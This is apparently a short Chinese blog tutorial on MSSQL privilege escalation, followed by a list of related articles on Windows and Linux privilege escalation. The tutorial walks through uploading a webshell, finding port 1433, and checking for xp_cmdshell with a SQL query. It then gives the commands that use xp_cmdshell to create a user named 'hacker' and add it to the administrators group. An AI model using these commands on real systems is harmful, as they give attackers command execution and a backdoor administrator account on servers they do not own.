mssqlserver xp_cmdshell提權
首先把大馬上傳上去,再webshell.asp上進行操作
進行埠掃描,發現有1433埠存在,說明有mssql資料庫
在sql操作命令處,進行輸入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 檢視xp_cmdshell是否開啟
新增系統賬號:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
加入管理員組:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
相關文章
- [提權禁區] SQL語句利用xp_cmdshell獲取許可權SQL
- SQL隱碼攻擊中利用XP_cmdshell提權的用法SQL
- 2023.7.2-3-4Mssql xp_cmdshell提權SQL
- 提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權Windows伺服器SQL
- 內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令內網SQL資料庫
- Linux提權————利用SUID提權LinuxUI
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- windows提權--組策略首選項提權Windows
- [提權禁區]1433埠入侵提權
- Linux提權-70種sudo提權彙總Linux
- SQL Sever提權SQL
- Linux 提權Linux
- mysql UDF提權MySql
- 利用for命令提權
- windows提權 (一)Windows
- Linux提權Linux
- Windows令牌竊取提權和爛土豆提權學習Windows
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- Windows提權總結Windows
- Powershell 提權框架-Powerup框架
- Windows提權系列————上篇Windows
- Windows提權系列————下篇Windows
- Linux 提權-CapabilitiesLinux
- 提權 | Windows系統Windows
- bulldog_1 提權
- MySQL UDF 提權初探MySql
- linux sudo提權Linux
- Linux提權-許可權升級Linux
- Linux提權————Linux下三種不同方式的提權技巧Linux
- Potato家族本地提權分析
- 提權學習筆記筆記
- Linux 提權-MySQL UDFLinuxMySql
- Linux 提權-LXD 容器Linux
- Linux 提權-Docker 容器LinuxDocker
- DC-5-screen提權
- DC-4-teehee提權
- DC-9-sudo提權
- Linux 提權-NFS 共享LinuxNFS